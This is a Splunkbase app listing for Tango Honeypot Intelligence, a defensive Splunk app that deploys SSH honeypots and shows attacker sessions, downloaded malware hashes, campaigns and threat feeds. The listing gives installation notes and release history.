icon/x Created with Sketch.

Splunk Cookie Policy

We use our own and third-party cookies to provide you with a great online experience. We also use these cookies to improve our products and services, support our marketing campaigns, and advertise to you on our website and other websites. Some cookies may continue to collect information after you have left our website. Learn more (including how to update your settings) here.
Accept Cookie Policy

We are working on something new...

A Fresh New Splunkbase
We are designing a New Splunkbase to improve search and discoverability of apps. Check out our new and improved features like Categories and Collections. New Splunkbase is currently in preview mode, as it is under active development. We welcome you to navigate New Splunkbase and give us feedback.

Accept License Agreements

This app is provided by a third party and your right to use the app is in accordance with the license provided by that third-party licensor. Splunk is not responsible for any third-party apps and does not provide any warranty or support. If you have any questions, complaints or claims with respect to this app, please contact the licensor directly.

Thank You

Downloading Tango Honeypot Intelligence
SHA256 checksum (tango-honeypot-intelligence_21.tgz) 856b62ea0e11ef951a609bf7119f2d697e4eaa82ba7b7997122d65a5c2832736 SHA256 checksum (tango-honeypot-intelligence_20.tgz) 61e9dd9fabeabab10e3d8939a553aa259c37f08c5224b5a4600c98b7c8d7784a SHA256 checksum (tango-honeypot-intelligence_15.tgz) 8d4cd3ff6865c76b52c2e4a84ee2bcdd856c329aa63d619e8f73dbe69ecc6e65 SHA256 checksum (tango-honeypot-intelligence_141.tgz) 7c080fffd47c0bad99e7383b7c5fbfab3b9cbf3f0b6f373c72e2bf45d94fedb6 SHA256 checksum (tango-honeypot-intelligence_14.tgz) b5483e012a27bd021cb618f171f80d11d7cb0054220f9d182158e3a127d8adda SHA256 checksum (tango-honeypot-intelligence_13.tgz) 7010a0497ad470297eb6c40ace622788bd6a574fec7987c4508f492f4bd8300c SHA256 checksum (tango-honeypot-intelligence_12.tgz) 406f0c220207342e00311bfc05eb902928740da11b2b8559f132b5b3dfabf306 SHA256 checksum (tango-honeypot-intelligence_11.tgz) 93d71c56c7cb3bde3faa24ab4a9cc068399a7a3345ee2128687a0b6ece57bb53 SHA256 checksum (tango-honeypot-intelligence_10.tgz) 57b702a02ecaf80fc2a85184d0106fd73108643a2974e39a07c042156d124dcb
To install your download
For instructions specific to your download, click the Details tab after closing this window.

Flag As Inappropriate

splunk

Tango Honeypot Intelligence

This app has been archived. Learn more about app archiving.
This app is NOT supported by Splunk. Please read about what that means for you here.
Overview
Details
Using this companion Splunk app with the scripts and apps in the Tango Honeypot Intelligence project, you can quickly deploy and manage your honeypots, while also being able to view your honeypot logs with ease. This app provides the dashboards and functionality to give you the maximum visibility into your honeypot network, so you can research the malware and sessions without having to create your own front-end solution for a large honeypot deployment.

About

Tango is a set of scripts and Splunk apps which help organizations and users quickly and easily deploy honeypots and then view the data and analysis of the attacker sessions.

Requirements

  • You will need to add your own VirusTotal API key to the Splunk app, which can be configured at /opt/splunk/etc/apps/tango/bin/vt.py The API is free to obtain, you will just need to follow the procedures found on their website to receive one. Please note that you are limited to 4 requests per minute, so if you attempt to do more than that, you will not receive any information. This pertains to the File Analysis section of the Splunk Honeypot Intelligence app.
  • In order for the VirusTotal custom command to work, you'll need to add the Python library "requests" source into the tango app's bin directory /opt/splunk/etc/apps/tango/bin/. Requests can be found here: Kenneth Reitz Github.
  • To install requests, you can run git clone https://github.com/kennethreitz/requests/ in /tmp, then move the folder called requests from inside that directory into `/opt/splunk/etc/apps/tango/bin'
  • If you want to add some visualizations to Tango, you will need to install the dendrogram splunk app, which can be found here. Once installed, you'll want to run the command below to move the contents over to Tango:
$ cp -r /opt/splunk/etc/apps/hobbes3_dendrogram/appserver/static/ /opt/splunk/etc/apps/tango/appserver/static
  • By default, this app displays the count and values of the nodes, which can be visually distracting. If you wish to remove these values from being displayed, edit the autodiscover.js file in /opt/splunk/etc/apps/tango/appserver/static/dendrogram/dendrogam.js and change lines 206 and 207 to:
var long_label = d.name
var short_label = d.name
  • Restart Splunk after you made the above changes.

Before You Begin

There are a few things that should be noted before you install:

  • The Tango Honeypot Intelligence Splunk App is built to use JSON formatted data from Kippo, this was made available in the fork maintained by Michel Oosterhof, which can be found on his github. He recently added this feature, so you will need to grab the latest copy for this app to work properly (if deploying the honeypot and Splunk separately.)
  • If you want to automatically deploy preconfigured honeypots alongside a Splunk Universal Forwarder, you can use the other tools included with Tango, which can be found at the Tango GitHub project page

Using the Tango Honeypot Intelligence Splunk App

Once you enter the app, you'll be first taken to the "Attack Overview" portion of the app, which shows a broad overview of the attacks against your sensors. This includes Attempts vs. Successes, Latest Logins, Attackers logging into multiple locations, etc.

You'll notice at the top of the app, in the navigation pane, there are multiple categories of reports available to you, which include:

  • Attack Analysis
  • File Analysis
  • Network Analysis
  • Sensor Management
  • Threat Feed

Below we will go through each section and describe some of the data available in each section.

Attack Analysis

Attack Overview

This dashboard shows a broad overview of the attacks against your sensors. This includes Attempts vs. Successes, Latest Logins, Attackers logging into multiple locations, etc.

Session Playlog

This is one of the most beneficial dashboards available in the app, since it actually shows you what the attacker is doing on your honeypot. At the top of the dashboard, you can see the most recent sessions along with a filter to select a particular sensor. Clicking on a session will populate the panels below, which includes the passwords attempted/accepted, the commands entered, any files downloaded during the session and the raw logs for the session.

Attacker Profile

Using this dashboard, you can inquire about a certain IP and if seen in the app, you can get valuable information pertaining to that IP to include:

  • Geolocational data
  • Times seen
  • SSH Client versions
  • Sessions seen
  • Files Downloaded
  • Malware Downloaded Visualization
Session Analysis

This series of dashboards contains some analytical information, to include the % of sessions with interaction, the various SSH versions seen, some environment details extracted by the session, and a Human vs. Bot Identification dashboard.

Location Overview

In this section, you are able to see various geographical data related to each session and attacker. There are currently three dashboards available:

  • Top countries from which attackers have logged in from
  • Top countries where attackers have scanned from
  • Top sensors that have been attacked

We also include a map which includes the location of attackers seen.

Username/Password Analysis

Currently, this dashboard contains the top usernames and passwords seen being attempted by the attackers, as well as the top username/password combinations.

Malware Analysis

File Analysis

Starting at the top of this page, you can see the latest files downloaded by attackers, which includes the following:

  • URL of file
  • SHA256 Hash of file
  • Sensor which the file was seen being download
  • The session identifier of the session, which the file was downloaded
  • The time that the file was downloaded

Below that is the latest "Attempted" file downloads. This contains URL's that were seen in a session that do not have a corresponding SHA256 hash (which indicates a successful download). This can be due to a server error on the hosting website, an incorrect spelling of the file, or if this URL was seen elsewhere in the command, perhaps as an argument or target site of the malware.

Lastly, is a panel which you are able to look up a particular SHA256 hash seen previously downloaded in VirusTotal to retrieve the following information:

  • Date Scanned
  • SHA256 Hash
  • How many AV vendors identified this file
  • The various signatures of the file

Please note that the VirusTotal API is limited to 4 requests per minute. With that being said, you can use this panel to quickly lookup the file hashes seen by in your sessions.

This "lookup" will produce a local "cache" to use in other dashboards, so it's useful to run lookups on any malware you see. This was created do to limitations in the Virustotal API, and will be used as a workaround for the time being.

Malware Analysis

This dashboard will show the Top 10 Malware Signatures we've seen over time, as well as the most recent legitimate malware. This dashboard is populated from the VirusTotal local "cache" found on the File Analysis page. This dashboard will also show you files that have been downloaded, but, produced no signatures in Virustotal.

Malware Campaigns

This set of reports give you information on possible campaigns associated with your sessions. Currently this includes:

  • Potential Malware Campaigns (By URL)
  • Potential Malware Campaigns (By Domain)
  • Potential Malware Campaigns (By Filename)
  • Potential Malware Campaigns (By SHA Hash)

This section will continue to be developed to include other possible campaign attribution by looking at other TTP's associated with each session. This could include commands entered during each session, terminal variables (size, language, SSH keys, etc.). For now, we can see the URL's, Domain's and Filenames that have been seen being used by multiple attackers.

Network Analysis

Network Analysis

This dashboard currently includes reports on the following:

  • Top Domains Seen
  • Same URI on Multiple Domains
  • Latest IP Addresses Seen

Network Visualization

This dashboard provides a graphical representation of the malware downloaded onto each sensor by each attacker, along with the URL and SHASUM of the malware.

Sensor Management

Add Sensor

This page contains the necessary commands to run on a system to install a honeypot using scripts from the Tango repository.

Edit Sensor

In this dashboard, you are able to edit a few fields for your sensors, these fields are:

  • Owner
  • Owner Email
  • Comment
Sensor Status

This dashboard provides geographical information pertaining to each sensor currently deployed. You will find the following information available to you in this dashboard:

  • Sensor Name
  • Last Active
  • Sensor IP Address (External IP)
  • ASN
  • ASN Country
  • Network Name
  • Network Range

This dashboard also provides you with a map populated with the locations of all your sensors deployed.

Threat Feed

Lastly, this dashboard contains feeds which you can download and integrate with other network monitoring solutions, which will hopefully be automated in the future.

The feeds currently available are:

  • IP Addresses
  • Potentially Malicious URLs
  • SHA File Hashes
  • Potentially Malicious Domains
  • File Names

To-Do

  • Utilize Data Models to speed up searches
  • Auto-extract indicators inside of malware
  • TOR Exit Node Identifier

Known Issues

  • The sensor management page will not update automatically, it is currently set to populate new sensors at midnight. I'm working to do this a better way.

Credits

Release Notes

Version 2.1
Sept. 28, 2015

Version 2.1
Fixed permissions error and updated dashboards

Version 2.0

Now ships with UF 6.3.0
Uses Cowrie Honeypot instead of Kippo to enable better logging and bug fixes

Version 2.0
Sept. 25, 2015

Version 2.0

Now ships with UF 6.3.0
Uses Cowrie Honeypot instead of Kippo to enable better logging and bug fixes

Version 1.5
March 23, 2015

Version 1.5

  • Bug Fix: Updated App Logo
  • Bug Fix: Fixed an issue with Attacker Profile not showing interactive sessions
  • Enhancement: Fixed 'Add Sensor' page with correct code syntax
  • Enhancement: Fixed Colorscheme
  • Enhancement: Added new page - Network Visualization
  • Enhancement: Added visualization in Attacker Profile

Version 1.3

  • Fixed App Logo

Version 1.2

  • New page under Sensor Management, which provides instructions to install a new honeypot
  • General Bug Fixes

Version 1.1

  • Fixed App Logo

Version 1.0

Version 1.4.1
March 23, 2015

Version 1.4.1

  • Bug Fix: Updated App Logo

Version 1.4

  • Bug Fix: Fixed an issue with Attacker Profile not showing interactive sessions
  • Enhancement: Fixed 'Add Sensor' page with correct code syntax
  • Enhancement: Fixed Colorscheme

Version 1.3

  • Fixed App Logo

Version 1.2

  • New page under Sensor Management, which provides instructions to install a new honeypot
  • General Bug Fixes

Version 1.1

  • Fixed App Logo

Version 1.0

Version 1.4
March 23, 2015

Version 1.4

  • Bug Fix: Fixed an issue with Attacker Profile not showing interactive sessions
  • Enhancement: Fixed 'Add Sensor' page with correct code syntax
  • Enhancement: Fixed Colorscheme

Version 1.3

  • Fixed App Logo

Version 1.2

  • New page under Sensor Management, which provides instructions to install a new honeypot
  • General Bug Fixes

Version 1.1

  • Fixed App Logo

Version 1.0

Version 1.3
March 19, 2015

Version 1.3

  • Fixed App Logo

Version 1.2

  • New page under Sensor Management, which provides instructions to install a new honeypot
  • General Bug Fixes

Version 1.1

  • Fixed App Logo

Version 1.0

Version 1.2
March 19, 2015

Version 1.2

  • Attempted to fix App Logo again
  • New page under Sensor Management, which provides instructions to install a new honeypot
  • General Bug Fixes

Version 1.1

  • Fixed App Logo

Version 1.0

Version 1.1
March 13, 2015

Version 1.1

  • Fixed App Logo

Version 1.0

Version 1.0
March 13, 2015

Version 1.0 Release


Subscribe Share

Are you a developer?

As a Splunkbase app developer, you will have access to all Splunk development resources and receive a 10GB license to build an app that will help solve use cases for customers all over the world. Splunkbase has 1000+ apps from Splunk, our partners and our community. Find an app for most any data source and user need, or simply create your own with help from our developer portal.

Follow Us:
Splunk, Splunk>,Turn Data Into Doing, Data-to-Everything, and D2E are trademarks or registered trademarks of Splunk Inc. in the United States and other countries. All other brand names,product names,or trademarks belong to their respective owners.